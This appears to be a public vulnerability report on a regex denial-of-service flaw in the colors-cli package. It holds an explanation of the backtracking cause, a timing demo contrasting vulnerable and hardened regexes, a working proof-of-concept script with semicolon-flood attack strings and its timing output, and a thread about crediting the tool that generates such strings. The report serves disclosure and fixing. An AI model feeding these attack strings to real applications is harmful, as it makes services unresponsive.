Inefficient Regular Expression Complexity in jaywcjlove/colors-cli
Reported on Sep 11th 2021
✍️ Description
The colors-cli package is vulnerable to ReDoS (regular expression denial of service). An attacker who can supply crafted input to its ANSI-escape-stripping regex (the ansi-regex functionality) can make an application consume an excessive amount of CPU.
The line pinned in the report uses the vulnerable regex. The ReDoS is mainly due to the sub-patterns [\#;?]* and (?:;[a-zA-Z\d]): both can consume a run of semicolons, so when the overall match fails the engine backtracks through every way of splitting that run between them, and matching time grows quadratically with the length of the run.
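To make the backtracking concrete, the following is an added example (not code from colors-cli or the reporter). The two patterns are simplified regexes modelled on the sub-patterns named above; they are assumptions, not the project's actual regex. The first keeps the ambiguity (two adjacent sub-patterns can each absorb a ';'), the second removes it, and the timing helper shows the quadratic versus linear cost on the same ESC[ + ';' run the PoC uses.

```javascript
// Added example, not colors-cli's own code. Both regexes are simplified
// assumptions modelled on the sub-patterns the report names.

// Vulnerable shape: `[#;?]*` and `(?:;[a-zA-Z\d]*)*` can both consume a run of
// ';', and the required trailing BEL (\u0007) is absent from the attack string,
// so the engine retries every split of the run between them: O(n^2) steps.
const VULNERABLE_RE = /\u001B\[[#;?]*(?:[a-zA-Z\d]*(?:;[a-zA-Z\d]*)*)?\u0007/;

// Hardened shape: ';' is dropped from the leading class, so each ';' can be
// matched by exactly one sub-pattern and a failed match backtracks linearly.
const HARDENED_RE = /\u001B\[[#?]*(?:[a-zA-Z\d]*(?:;[a-zA-Z\d]*)*)?\u0007/;

// Same attack string as the report's PoC: ESC "[" followed by n semicolons.
function attackString(n) {
  return "\u001B[" + ";".repeat(n);
}

// Millisecond clock with sub-ms resolution where available.
const now = typeof performance !== "undefined" ? () => performance.now() : () => Date.now();

// Run re.test(input) once and return the result plus elapsed milliseconds.
function timeTest(re, input) {
  const start = now();
  const matched = re.test(input);
  return { matched, ms: now() - start };
}

// Time taken for 2n semicolons divided by time for n: about 4 for a quadratic
// pattern, about 2 or noise for a linear one. Keep n modest for VULNERABLE_RE.
function growthRatio(re, n) {
  const t1 = timeTest(re, attackString(n)).ms;
  const t2 = timeTest(re, attackString(2 * n)).ms;
  return t2 / t1;
}

function demo() {
  // Constructed benign samples: both patterns accept them.
  for (const s of ["\u001B[?1;31m\u0007", "\u001B[;1m\u0007"]) {
    console.log(JSON.stringify(s), VULNERABLE_RE.test(s), HARDENED_RE.test(s));
  }
  for (const n of [2000, 4000, 8000]) {
    const v = timeTest(VULNERABLE_RE, attackString(n));
    const h = timeTest(HARDENED_RE, attackString(n));
    console.log(`n=${n} vulnerable=${v.ms.toFixed(1)}ms hardened=${h.ms.toFixed(3)}ms`);
  }
  console.log("growth ratio (vulnerable, n=4000):", growthRatio(VULNERABLE_RE, 4000).toFixed(1));
}

demo();
```

Run it with node; the vulnerable column roughly quadruples each time n doubles, while the hardened column stays flat even at the 50,000-semicolon sizes from the PoC. The general lesson is that two adjacent sub-patterns that can match the same character class, followed by something that can fail, is the shape to look for when auditing a regex.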
🕵️‍♂️ Proof of Concept
// PoC.js
var color = require('colors-cli/safe')
// Each iteration feeds ESC "[" followed by i*10000 semicolons to color.red(),
// which runs the input through the vulnerable ANSI regex. The time per call
// grows quadratically with the length of the run of ';'.
for(var i = 1; i <= 50000; i++) {
  var time = Date.now();
  var attack_str = "\u001B[" + ";".repeat(i*10000);
  color.red(attack_str)
  var time_cost = Date.now() - time;
  console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms")
}
Check the output:
attack_str.length: 10002: 1132 ms
attack_str.length: 20002: 4162 ms
attack_str.length: 30002: 9244 ms
attack_str.length: 40002: 17362 ms
attack_str.length: 50002: 28197 ms
attack_str.length: 60002: 39578 ms
💥 Impact
A crafted input of a few tens of kilobytes ties up the CPU for tens of seconds, so this vulnerability can exhaust system resources and render the calling application unresponsive (denial of service). Ideally, processing a string of this size should take 0-10 milliseconds.
Occurrences
SECURITY.md
@jaywcjlove Thank you for your time and confirmation.
@YetingLi I have been following your work for a long time. I am a fan of your work. Yeah, I am using the publicly available exploit from your code to do other PoCs which were not reported yet.
@yetingli I am also using your tool https://github.com/yetingli/ReDoSHunter to generate "Attack String".
Sorry, I didn't know that I need permission to use a PoC/patch/tool that is publicly available. I thought that if an issue is public we can use it without any permission.
I have been using your pattern to find ReDoS vulnerabilities and also providing patches on GitHub for a long time.
I'm glad you can pay attention to my work and tools. I hope you can mention it next time you use my tool.
I'm glad you can pay attention to my work and tools. I hope you can cite it next time you use my tool.
@yetingli Yeah, sure, I will credit you as well whenever I find an issue using your tools/pattern. Thanks for understanding.
@yetingli By the way, I reported many issues today by following your tool/pattern. Thanks for such a useful tool.
@ready-research Okay, the reported issues should explicitly acknowledge our work when submitting.